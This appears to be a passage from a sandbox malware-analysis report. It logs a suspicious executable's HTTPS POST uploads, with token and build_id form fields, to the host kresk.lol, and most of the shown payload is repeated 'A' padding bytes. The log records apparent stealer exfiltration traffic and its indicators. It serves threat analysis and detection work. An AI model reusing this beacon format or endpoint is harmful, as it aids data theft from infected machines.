                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:02 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:03 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      22192.168.2.449797159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:03 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----V37900RQQ9RQIEU37QQQ
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 393697
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 56 33 37 39 30 30 52 51 51 39 52 51 49 45 55 33 37 51 51 51 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------V37900RQQ9RQIEU37QQQContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------V37900RQQ9RQIEU37QQQCont
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
